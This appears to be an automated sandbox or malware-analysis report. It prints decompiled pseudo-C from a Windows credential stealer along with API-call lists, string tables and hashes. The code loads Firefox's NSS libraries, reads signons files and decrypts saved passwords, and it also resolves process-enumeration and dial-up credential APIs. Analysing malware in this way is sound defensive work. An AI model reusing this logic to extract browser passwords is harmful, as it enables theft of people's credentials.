														_push("\\Mozilla\\Firefox\\");
														E00401D24( &_v540, 0x105,  &_v357);
														_push(_v540);
														_push("\\signons1.txt");
														E00401E10();
														_t405 = E00401F48(_v532);
														goto L48;
													}
												} else {
													E00405BEC( &_v508, _t625, _t760, __eflags);
													_push(_v508);
													_push("\\Mozilla\\Firefox\\");
													E00401D24( &_v512, 0x105,  &_v357);
													_push(_v512);
													_push("\\signons2.txt");
													E00401E10();
													_t405 = E00401F48(_v504);
													goto L48;
												}
											} else {
												E00405BEC( &_v480, _t625, _t760, __eflags);
												_push(_v480);
												_push("\\Mozilla\\Firefox\\");
												E00401D24( &_v484, 0x105,  &_v357);
												_push(_v484);
												_push("\\signons3.txt");
												E00401E10();
												_t405 = E00401F48(_v476);
												L48:
												_v44 = CreateFileA(_t405, 0x80000000, 1, 0, 3, 0, 0);
												_v48 = GetFileSize(_v44, 0);
												_v52 = E00401174(_v48);
												ReadFile(_v44, _v52, _v48,  &_v60, 0);
												CloseHandle(_v44);
												E00401CAC( &_v56, _v52);
												E0040118C(_v52);
												E00401FE4( &_v56, E0040202C(0x40ade4, _v56) + 2, 1);
												E00405BEC( &_v576, _t625, _t760, __eflags);
												E00401D24( &_v580, 0x105,  &_v357);
												E00401E10();
												_t433 = _v12(E00401F48(_v572), _v580, "\\Mozilla\\Firefox\\", _v576);
												__eflags = _t433;
												if(_t433 == 0) {
													_v80 = _v16();
													__eflags = _v80;
													if(_v80 != 0) {
														_t466 = _v20(_v80, 1, 0);
														_t763 = _t763 + 0xc;
														__eflags = _t466;
														if(_t466 == 0) {
															while(1) {
																L60:
																_t470 = E00401D50(_v56);
																__eflags = _t470;
																if(_t470 == 0) {
																	goto L61;
																}
																E00401FA4(_v56, E0040202C(0x40ade4, _v56) - 1, 1,  &_v64);
																E00401FE4( &_v56, E00401D50(_v64) + 3, 1);
																E00401FA4(_v64, E0040202C(0x40adf0, _v64) - 1, 1,  &_v68);
																E00401FE4( &_v64, E00401D50(_v68) + 2, 1);
																_push(_v84);
																_push("##$$");
																_push(_v68);
																_push(0x40ae0c);
																E00401E10();
																while(1) {
																	_t491 = E00401D50(_v64);
																	__eflags = _t491;
																	if(_t491 == 0) {
																		goto L60;
																	}
																	E00401FA4(_v64, E0040202C(0x40adf0, _v64) - 1, 1,  &_v72);
																	E00401FE4( &_v64, E00401D50(_v72) + 2, 1);
																	E00401FA4(_v64, E0040202C(0x40adf0, _v64) - 1, 1,  &_v76);
																	E00401FE4( &_v64, E00401D50(_v76) + 2, 1);
																	 *_t760(0,  &_v369, E00401F48(_v76), E00401D50(_v76));
																	_t518 =  *_t756( &_v369,  &_v381, 0);
																	_t763 = _t763 + 0x1c;
																	__eflags = _t518;
																	if(_t518 == 0) {
																		E00401CAC(_t625, _v377);
																		E00402074(_t625, _v373);
																		_t524 = E00401D50(_v72);
																		__eflags = _t524;
																		if(_t524 == 0) {
																			E00401B58( &_v72, "(unnamed value)");
																		}
																		_t526 = E00401D50(_v76);
																		__eflags = _t526;
																		if(_t526 == 0) {
																			E00401B58( &_v76, "(unnamed password)");
																		}
																		_push(_v84);
																		_push( *_t625);
																		_push(0x40ae0c);
																		E00401E10();
																	}
																}
															}
														}
														L61:
														_v28(_v80);
													}
													_v24();
												}
												E00401D9C(_t625, 0x40adfc, _v84);
												E00401B58( &_v92, _v84);
												E0040592C(0x40adfc, _t625, _v92, 0, _t760, __eflags,  &_v584);
												E00401B58( &_v92, _v584);
												E0040592C(0x40ae0c, _t625, _v92, 0, _t760, __eflags,  &_v588);
												E00401B58( &_v92, _v588);
												E0040592C(0x40ae4c, _t625, _v92, 0, _t760, __eflags,  &_v592);
												E00401B58( &_v92, _v592);
												__eflags = _v92;
												if(_v92 == 0) {
													E00401AC0(_t625);
												}
												_v88 = 7;
												_v96 =  &_v412;
												do {
													_push(_t762);
													_push(0x40ab4f);
													_push( *[fs:eax]);
													 *[fs:eax] = _t763;
													FreeLibrary( *_v96);
													FreeLibrary(_v8);
													_pop(_t719);
													 *[fs:eax] = _t719;
													_v96 =  &(_v96[1]);
													_t270 =  &_v88;
													 *_t270 = _v88 - 1;
													__eflags =  *_t270;
												} while ( *_t270 != 0);
											}
										} else {
											E00401AC0(_t625);
											_v88 = 7;
											_v96 =  &_v412;
											do {
												_push(_t762);
												_push(0x40a3e8);
												_push( *[fs:eax]);
												 *[fs:eax] = _t763;
												FreeLibrary( *_v96);
												FreeLibrary(_v8);
												_pop(_t744);
												 *[fs:eax] = _t744;
												_v96 =  &(_v96[1]);
												_t103 =  &_v88;
												 *_t103 = _v88 - 1;
												__eflags =  *_t103;
											} while ( *_t103 != 0);
										}
									} else {
										E00401AC0(_t625);
										_v88 = 7;
										_v96 =  &_v412;
										do {
											_push(_t762);
											_push(0x40a376);
											_push( *[fs:eax]);
											 *[fs:eax] = _t763;
											FreeLibrary( *_v96);
											FreeLibrary(_v8);
											_pop(_t745);
											 *[fs:eax] = _t745;
											_v96 =  &(_v96[1]);
											_t91 =  &_v88;
											 *_t91 = _v88 - 1;
											__eflags =  *_t91;
										} while ( *_t91 != 0);
									}
								} else {
									E00401AC0(_t625);
									_v88 = 7;
									_v96 =  &_v412;
									do {
										_push(_t762);
										_push(0x40a304);
										_push( *[fs:eax]);
										 *[fs:eax] = _t763;
										FreeLibrary( *_v96);
										FreeLibrary(_v8);
										_pop(_t746);
										 *[fs:eax] = _t746;
										_v96 =  &(_v96[1]);
										_t79 =  &_v88;
										 *_t79 = _v88 - 1;
										__eflags =  *_t79;
									} while ( *_t79 != 0);
								}
							} else {
								E00401AC0(_t625);
								_v88 = 7;
								_v96 =  &_v412;
								do {
									_push(_t762);
									_push(0x40a295);
									_push( *[fs:eax]);
									 *[fs:eax] = _t763;
									FreeLibrary( *_v96);
									FreeLibrary(_v8);
									_pop(_t747);
									 *[fs:eax] = _t747;
									_v96 =  &(_v96[1]);
									_t69 =  &_v88;
									 *_t69 = _v88 - 1;
									__eflags =  *_t69;
								} while ( *_t69 != 0);
							}
						} else {
							E00401AC0(_t625);
							_v88 = 7;
							_v96 =  &_v412;
							do {
								_push(_t762);
								_push(0x40a223);
								_push( *[fs:eax]);
								 *[fs:eax] = _t763;
								FreeLibrary( *_v96);
								FreeLibrary(_v8);
								_pop(_t748);
								 *[fs:eax] = _t748;
								_v96 =  &(_v96[1]);
								_t58 =  &_v88;
								 *_t58 = _v88 - 1;
								__eflags =  *_t58;
							} while ( *_t58 != 0);
						}
					} else {
						E00401AC0(_t625);
						_v88 = 7;
						_v96 =  &_v412;
						do {
							_push(_t762);
							_push(0x40a1b1);
							_push( *[fs:eax]);
							 *[fs:eax] = _t763;
							FreeLibrary( *_v96);
							FreeLibrary(_v8);
							_pop(_t749);
							 *[fs:eax] = _t749;
							_v96 =  &(_v96[1]);
							_t47 =  &_v88;
							 *_t47 = _v88 - 1;
							__eflags =  *_t47;
						} while ( *_t47 != 0);
					}
				} else {
					E00401AC0(_t625);
					_v88 = 7;
					_v96 =  &_v412;
					do {
						_push(_t762);
						_push(0x40a140);
						_push( *[fs:eax]);
						 *[fs:eax] = _t763;
						FreeLibrary( *_v96);
						FreeLibrary(_v8);
						_pop(_t750);
						 *[fs:eax] = _t750;
						_v96 =  &(_v96[1]);
						_t37 =  &_v88;
						 *_t37 = _v88 - 1;
					} while ( *_t37 != 0);
				}
				_pop(_t701);
				 *[fs:eax] = _t701;
				_push(E0040ABAC);
				E00401AE4( &_v592, 0x2d);
				E00401AC0( &_v92);
				E00401AC0( &_v84);
				E00401AE4( &_v76, 4);
				return E00401AC0( &_v56);
			}














































































































                                    0x00409ef9
                                    0x00409efb
                                    0x00409f00
                                    0x00409f00
                                    0x00409f02
                                    0x00409f04
                                    0x00409f04
                                    0x00409f07
                                    0x00409f08
                                    0x00409f0b
                                    0x00409f14
                                    0x00409f15
                                    0x00409f1a
                                    0x00409f1d
                                    0x00409f20
                                    0x00409f23
                                    0x00409f2b
                                    0x00409f38
                                    0x00409f38
                                    0x00409f44
                                    0x00409f4c
                                    0x00409f51
                                    0x00409f53
                                    0x00409f58
                                    0x00409f68
                                    0x00409f7e
                                    0x00409f84
                                    0x00409f86
                                    0x00409f8b
                                    0x00409f9b
                                    0x00409fb1
                                    0x00409fb7
                                    0x00409fb9
                                    0x00409fbe
                                    0x00409fce
                                    0x00409fe4
                                    0x00409fea
                                    0x00409fec
                                    0x00409ff1
                                    0x0040a001
                                    0x0040a017
                                    0x0040a01d
                                    0x0040a01f
                                    0x0040a024
                                    0x0040a034
                                    0x0040a04a
                                    0x0040a050
                                    0x0040a052
                                    0x0040a057
                                    0x0040a067
                                    0x0040a07d
                                    0x0040a083
                                    0x0040a085
                                    0x0040a08a
                                    0x0040a09a
                                    0x0040a0b0
                                    0x0040a0b6
                                    0x0040a0b8
                                    0x0040a0bd
                                    0x0040a0cd
                                    0x0040a0e3
                                    0x0040a0f4
                                    0x0040a0f6
                                    0x0040a0fb
                                    0x0040a166
                                    0x0040a168
                                    0x0040a16a
                                    0x0040a16c
                                    0x0040a1d7
                                    0x0040a1d9
                                    0x0040a1dc
                                    0x0040a1de
                                    0x0040a249
                                    0x0040a24b
                                    0x0040a24e
                                    0x0040a250
                                    0x0040a2bb
                                    0x0040a2bd
                                    0x0040a2bf
                                    0x0040a32a
                                    0x0040a32d
                                    0x0040a331
                                    0x0040a39c
                                    0x0040a39f
                                    0x0040a3a3
                                    0x0040a40a
                                    0x0040a41b
                                    0x0040a42a
                                    0x0040a435
                                    0x0040a43a
                                    0x0040a440
                                    0x0040a445
                                    0x0040a455
                                    0x0040a481
                                    0x0040a48c
                                    0x0040a491
                                    0x0040a497
                                    0x0040a4ad
                                    0x0040a4b2
                                    0x0040a4b8
                                    0x0040a4c8
                                    0x0040a4e0
                                    0x0040a4f0
                                    0x0040a4f2
                                    0x0040a551
                                    0x0040a556
                                    0x0040a55c
                                    0x0040a572
                                    0x0040a577
                                    0x0040a57d
                                    0x0040a58d
                                    0x0040a5a5
                                    0x0040a5b5
                                    0x0040a5b7
                                    0x0040a616
                                    0x0040a61b
                                    0x0040a621
                                    0x0040a637
                                    0x0040a63c
                                    0x0040a642
                                    0x0040a652
                                    0x0040a66a
                                    0x0040a67a
                                    0x0040a67c
                                    0x0040a6db
                                    0x0040a6e0
                                    0x0040a6e6
                                    0x0040a6fc
                                    0x0040a701
                                    0x0040a707
                                    0x0040a717
                                    0x0040a72f
                                    0x0040a73f
                                    0x0040a741
                                    0x0040a799
                                    0x0040a743
                                    0x0040a749
                                    0x0040a74e
                                    0x0040a754
                                    0x0040a76a
                                    0x0040a76f
                                    0x0040a775
                                    0x0040a785
                                    0x0040a790
                                    0x00000000
                                    0x0040a790
                                    0x0040a67e
                                    0x0040a684
                                    0x0040a689
                                    0x0040a68f
                                    0x0040a6a5
                                    0x0040a6aa
                                    0x0040a6b0
                                    0x0040a6c0
                                    0x0040a6cb
                                    0x00000000
                                    0x0040a6cb
                                    0x0040a5b9
                                    0x0040a5bf
                                    0x0040a5c4
                                    0x0040a5ca
                                    0x0040a5e0
                                    0x0040a5e5
                                    0x0040a5eb
                                    0x0040a5fb
                                    0x0040a606
                                    0x00000000
                                    0x0040a606
                                    0x0040a4f4
                                    0x0040a4fa
                                    0x0040a4ff
                                    0x0040a505
                                    0x0040a51b
                                    0x0040a520
                                    0x0040a526
                                    0x0040a536
                                    0x0040a541
                                    0x0040a7a3
                                    0x0040a7b8
                                    0x0040a7c6
                                    0x0040a7d1
                                    0x0040a7e6
                                    0x0040a7ef
                                    0x0040a7fa
                                    0x0040a802
                                    0x0040a821
                                    0x0040a82c
                                    0x0040a84d
                                    0x0040a863
                                    0x0040a874
                                    0x0040a878
                                    0x0040a87a
                                    0x0040a883
                                    0x0040a886
                                    0x0040a88a
                                    0x0040a898
                                    0x0040a89b
                                    0x0040a89e
                                    0x0040a8a0
                                    0x0040aa65
                                    0x0040aa65
                                    0x0040aa68
                                    0x0040aa6d
                                    0x0040aa6f
                                    0x00000000
                                    0x00000000
                                    0x0040a8c7
                                    0x0040a8e1
                                    0x0040a902
                                    0x0040a91c
                                    0x0040a921
                                    0x0040a924
                                    0x0040a929
                                    0x0040a92c
                                    0x0040a939
                                    0x0040aa55
                                    0x0040aa58
                                    0x0040aa5d
                                    0x0040aa5f
                                    0x00000000
                                    0x00000000
                                    0x0040a95f
                                    0x0040a979
                                    0x0040a99a
                                    0x0040a9b4
                                    0x0040a9d4
                                    0x0040a9e9
                                    0x0040a9eb
                                    0x0040a9ee
                                    0x0040a9f0
                                    0x0040a9fa
                                    0x0040aa07
                                    0x0040aa0f
                                    0x0040aa14
                                    0x0040aa16
                                    0x0040aa20
                                    0x0040aa20
                                    0x0040aa28
                                    0x0040aa2d
                                    0x0040aa2f
                                    0x0040aa39
                                    0x0040aa39
                                    0x0040aa3e
                                    0x0040aa41
                                    0x0040aa43
                                    0x0040aa50
                                    0x0040aa50
                                    0x0040a9f0
                                    0x0040aa55
                                    0x0040aa65
                                    0x0040aa75
                                    0x0040aa79
                                    0x0040aa7c
                                    0x0040aa7d
                                    0x0040aa7d
                                    0x0040aa8a
                                    0x0040aa95
                                    0x0040aaab
                                    0x0040aab9
                                    0x0040aacf
                                    0x0040aadd
                                    0x0040aaf3
                                    0x0040ab01
                                    0x0040ab06
                                    0x0040ab0a
                                    0x0040ab0e
                                    0x0040ab0e
                                    0x0040ab13
                                    0x0040ab20
                                    0x0040ab23
                                    0x0040ab25
                                    0x0040ab26
                                    0x0040ab2b
                                    0x0040ab2e
                                    0x0040ab37
                                    0x0040ab40
                                    0x0040ab47
                                    0x0040ab4a
                                    0x0040ab59
                                    0x0040ab5d
                                    0x0040ab5d
                                    0x0040ab5d
                                    0x0040ab5d
                                    0x0040ab23
                                    0x0040a3a5
                                    0x0040a3a7
                                    0x0040a3ac
                                    0x0040a3b9
                                    0x0040a3bc
                                    0x0040a3be
                                    0x0040a3bf
                                    0x0040a3c4
                                    0x0040a3c7
                                    0x0040a3d0
                                    0x0040a3d9
                                    0x0040a3e0
                                    0x0040a3e3
                                    0x0040a3f2
                                    0x0040a3f6
                                    0x0040a3f6
                                    0x0040a3f6
                                    0x0040a3f6
                                    0x0040a3fb
                                    0x0040a333
                                    0x0040a335
                                    0x0040a33a
                                    0x0040a347
                                    0x0040a34a
                                    0x0040a34c
                                    0x0040a34d
                                    0x0040a352
                                    0x0040a355
                                    0x0040a35e
                                    0x0040a367
                                    0x0040a36e
                                    0x0040a371
                                    0x0040a380
                                    0x0040a384
                                    0x0040a384
                                    0x0040a384
                                    0x0040a384
                                    0x0040a389
                                    0x0040a2c1
                                    0x0040a2c3
                                    0x0040a2c8
                                    0x0040a2d5
                                    0x0040a2d8
                                    0x0040a2da
                                    0x0040a2db
                                    0x0040a2e0
                                    0x0040a2e3
                                    0x0040a2ec
                                    0x0040a2f5
                                    0x0040a2fc
                                    0x0040a2ff
                                    0x0040a30e
                                    0x0040a312
                                    0x0040a312
                                    0x0040a312
                                    0x0040a312
                                    0x0040a317
                                    0x0040a252
                                    0x0040a254
                                    0x0040a259
                                    0x0040a266
                                    0x0040a269
                                    0x0040a26b
                                    0x0040a26c
                                    0x0040a271
                                    0x0040a274
                                    0x0040a27d
                                    0x0040a286
                                    0x0040a28d
                                    0x0040a290
                                    0x0040a29f
                                    0x0040a2a3
                                    0x0040a2a3
                                    0x0040a2a3
                                    0x0040a2a3
                                    0x0040a2a8
                                    0x0040a1e0
                                    0x0040a1e2
                                    0x0040a1e7
                                    0x0040a1f4
                                    0x0040a1f7
                                    0x0040a1f9
                                    0x0040a1fa
                                    0x0040a1ff
                                    0x0040a202
                                    0x0040a20b
                                    0x0040a214
                                    0x0040a21b
                                    0x0040a21e
                                    0x0040a22d
                                    0x0040a231
                                    0x0040a231
                                    0x0040a231
                                    0x0040a231
                                    0x0040a236
                                    0x0040a16e
                                    0x0040a170
                                    0x0040a175
                                    0x0040a182
                                    0x0040a185
                                    0x0040a187
                                    0x0040a188
                                    0x0040a18d
                                    0x0040a190
                                    0x0040a199
                                    0x0040a1a2
                                    0x0040a1a9
                                    0x0040a1ac
                                    0x0040a1bb
                                    0x0040a1bf
                                    0x0040a1bf
                                    0x0040a1bf
                                    0x0040a1bf
                                    0x0040a1c4
                                    0x0040a0fd
                                    0x0040a0ff
                                    0x0040a104
                                    0x0040a111
                                    0x0040a114
                                    0x0040a116
                                    0x0040a117
                                    0x0040a11c
                                    0x0040a11f
                                    0x0040a128
                                    0x0040a131
                                    0x0040a138
                                    0x0040a13b
                                    0x0040a14a
                                    0x0040a14e
                                    0x0040a14e
                                    0x0040a14e
                                    0x0040a153
                                    0x0040ab64
                                    0x0040ab67
                                    0x0040ab6a
                                    0x0040ab7a
                                    0x0040ab82
                                    0x0040ab8a
                                    0x0040ab97
                                    0x0040aba4

                                    APIs
                                    • LoadLibraryA.KERNEL32(00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4,00000000,0040ABA5,?,?,?,?,00000048,00000000,00000000), ref: 00409F79
                                    • LoadLibraryA.KERNEL32(00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4,00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4,00000000,0040ABA5,?,?,?,?,00000048,00000000), ref: 00409FAC
                                    • LoadLibraryA.KERNEL32(00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4,00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4,00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4,00000000,0040ABA5), ref: 00409FDF
                                    • LoadLibraryA.KERNEL32(00000000,plc4.dll,\Mozilla Firefox\,0040F1D4,00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4,00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4,00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A012
                                    • LoadLibraryA.KERNEL32(00000000,plds4.dll,\Mozilla Firefox\,0040F1D4,00000000,plc4.dll,\Mozilla Firefox\,0040F1D4,00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4,00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A045
                                    • LoadLibraryA.KERNEL32(00000000,nssutil3.dll,\Mozilla Firefox\,0040F1D4,00000000,plds4.dll,\Mozilla Firefox\,0040F1D4,00000000,plc4.dll,\Mozilla Firefox\,0040F1D4,00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A078
                                    • LoadLibraryA.KERNEL32(00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000,nssutil3.dll,\Mozilla Firefox\,0040F1D4,00000000,plds4.dll,\Mozilla Firefox\,0040F1D4,00000000,plc4.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A0AB
                                    • LoadLibraryA.KERNEL32(00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000,nssutil3.dll,\Mozilla Firefox\,0040F1D4,00000000,plds4.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A0DE
                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040A0EF
                                    • FreeLibrary.KERNEL32(?,00000000,0040A140,?,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000,nssutil3.dll), ref: 0040A128
                                    • FreeLibrary.KERNEL32(?,?,00000000,0040A140,?,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000), ref: 0040A131
                                    • GetProcAddress.KERNEL32(?,NSSBase64_DecodeBuffer), ref: 0040A161
                                    • FreeLibrary.KERNEL32(?,00000000,0040A1B1,?,?,NSSBase64_DecodeBuffer,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A199
                                    • FreeLibrary.KERNEL32(?,?,00000000,0040A1B1,?,?,NSSBase64_DecodeBuffer,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\), ref: 0040A1A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Library$Load$Free$AddressProc
                                    • String ID: ##$$$(unnamed password)$(unnamed value)$.$GetUserProfileDirectoryA$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$Path$Profile0$\Mozilla Firefox\$\Mozilla\Firefox\$\signons.txt$\signons1.txt$\signons2.txt$\signons3.txt$mozcrt19.dll$nspr4.dll$nss3.dll$nssutil3.dll$plc4.dll$plds4.dll$profiles.ini$softokn3.dll$sqlite3.dll$userenv.dll$|||
                                    • API String ID: 1394111170-1366083549
                                    • Opcode ID: bc6cc1cb9f016107f0c4384eb824cf31047fdf5ec1b06ae8e90ff8a76f323cc9
                                    • Instruction ID: 201494fd93d22ac66a3c34dbacb415299a5c5dabc6a14464f117945b5b77da43
                                    • Opcode Fuzzy Hash: bc6cc1cb9f016107f0c4384eb824cf31047fdf5ec1b06ae8e90ff8a76f323cc9
                                    • Instruction Fuzzy Hash: 79620970A10208ABDB11EBA5C842ADEB7B9EF44304F5044BBF504B72E1DB7CAE558F59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E10, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404E10() {

				if( *0x40e944 == 0) {
					 *0x40e944 = GetModuleHandleA("kernel32.dll");
					if( *0x40e944 != 0) {
						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
					}
				}
				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                    0x00404e19
                                    0x00404e29
                                    0x00404e2e
                                    0x00404e41
                                    0x00404e53
                                    0x00404e65
                                    0x00404e77
                                    0x00404e89
                                    0x00404e9b
                                    0x00404ead
                                    0x00404ebf
                                    0x00404ed1
                                    0x00404ee3
                                    0x00404ef5
                                    0x00404f07
                                    0x00404f19
                                    0x00404f2b
                                    0x00404f3d
                                    0x00404f4f
                                    0x00404f4f
                                    0x00404e2e
                                    0x00404f57
                                    0x00404f65
                                    0x00404f66
                                    0x00404f69
                                    0x00404f69

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040822C, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 304COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				signed int _v3024;
				signed int _v3028;
				signed int _v3032;
				signed int _v3036;
				char _v3284;
				char _v3288;
				char _v3292;
				signed int _v3296;
				signed int _v3300;
				intOrPtr* _t114;
				void* _t131;

				_push(__ebx);
				_push(__edx | _a82);
				asm("popad");
				if(__ecx + 1 < 0) {
					_t131 = __eax;
					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp + 0xfffff328;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__edx = 0;
					_v3296 = 0;
					_v3300 = 0;
					_v3036 = 0;
					_v3032 = 0;
					_v32 = 0;
					_v36 = 0;
					_v40 = 0;
					_v48 = 0;
					_v52 = 0;
					_v56 = 0;
					_v16 = __eax;
					__eax = 0;
					_push(__ebp);
					_push(0x40861b);
					_push( *[fs:eax]);
					 *[fs:eax] = __esp;
					_v16 = E00401AC0(_v16);
					_v28 = E00407FF0();
					__eflags = _v28;
					if(_v28 != 0) {
						__eax = _v20;
						_push(_v20);
						__eax =  &_v24;
						__ecx = 1;
						__edx =  *0x408214; // 0x408218
						__eax = E00402FBC();
						__esp = __esp + 4;
						__edx = _v24;
						__eax = 0x108;
						 *_v24 = 0x108;
						__edx = 0x108 * _v20 >> 0x20;
						__eax = 0x108 * _v20;
						_v12 = 0x108 * _v20;
						__eax =  &_v20;
						_push( &_v20);
						__eax =  &_v12;
						_push( &_v12);
						__eax = _v24;
						_push(__eax);
						_push(0);
						_push(0);
						L00407B84();
						__eflags = __eax;
						if(__eax == 0) {
							_v200.dwOSVersionInfoSize = 0x94;
							 &_v200 = GetVersionExA( &_v200);
							__eax =  &_v28;
							__edx = 0x105;
							__eax = E00402074( &_v28, 0x105);
							__eax =  &_v32;
							__edx = 0x105;
							__eax = E00402074( &_v32, 0x105);
							__eflags = _v200.dwPlatformId - 2;
							if(_v200.dwPlatformId == 2) {
								__eflags = _v200.dwMajorVersion - 5;
